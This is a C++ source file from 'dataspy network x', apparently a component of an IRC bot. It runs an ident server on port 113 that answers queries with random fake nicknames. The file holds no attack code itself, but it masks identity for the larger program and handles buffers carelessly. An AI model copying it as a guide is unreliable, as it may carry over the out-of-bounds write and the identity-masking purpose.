 /*	
	dataspy network x version 0.5 beta
	Copyright (C) 2002 dataspy dot net INC

	This program is free software; you can redistribute it and/or
	modify it under the terms of the GNU General Public License
	as published by the Free Software Foundation; either version 2
	of the License, or (at your option) any later version.

	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
	GNU General Public License for more details.

	You should have received a copy of the GNU General Public License
	along with this program; if not, write to the Free Software
	Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
  */

 /*

	IdentServer.cpp - Provides a ident server

	Last revised : 31st March 2002

  */



#include <windows.h>
#include <stdio.h>
#include <winsock.h>

#include "../include/dsnxsockets.h"
#include "..\include\tcp.h"
#include "..\include\identserver.h"
#include "..\include\nickdb.h"


IdentServer ::IdentServer() : DSNXSocket(0,113) {

	DWORD tid;
	CreateThread(NULL,0,(DWORD(__stdcall *)(void *))DSNXListenLoop,(LPVOID)this,0,&tid);

}

DWORD IdentAccept(LPVOID params) {

	SOCKET inSock;

	char *inData=NULL,*delete_me,*buffer;
	short timeout=5000;
	int recvd;

	((DSNXSocket*)params)->CurThreads++;

	delete_me = GetNick(TRUE,rand(),16);
	inSock = TCPAccept(((DSNXSocket*)params)->s);

	while ( ( recvd = TCPRecv(inSock,&inData)) < 1 && timeout > 0)
	{
		Sleep(250);
		timeout-= 250;
	}

	if (recvd > 0)
	{
		inData[recvd - 2] =0;
		buffer = (char*)malloc(24 + lstrlen(inData) + lstrlen(delete_me));

		TCPSend(inSock,buffer,sprintf(buffer,"%s : USERID : UNIX : %s\r\n",inData,delete_me));

		free(buffer);

	}

	closesocket(inSock);
	free(delete_me);
	free(inData);
	((DSNXSocket*)params)->CurThreads --;

	return 0;
}

DWORD IdentServer::Dome(LPVOID params){

	DWORD tid;
	CreateThread(NULL,0,(DWORD(__stdcall *)(void *))IdentAccept,(LPVOID)this,0,&tid);
	
	return 0;
}


DWORD IdentServer::Kill(LPVOID params) {



	return 0;
}


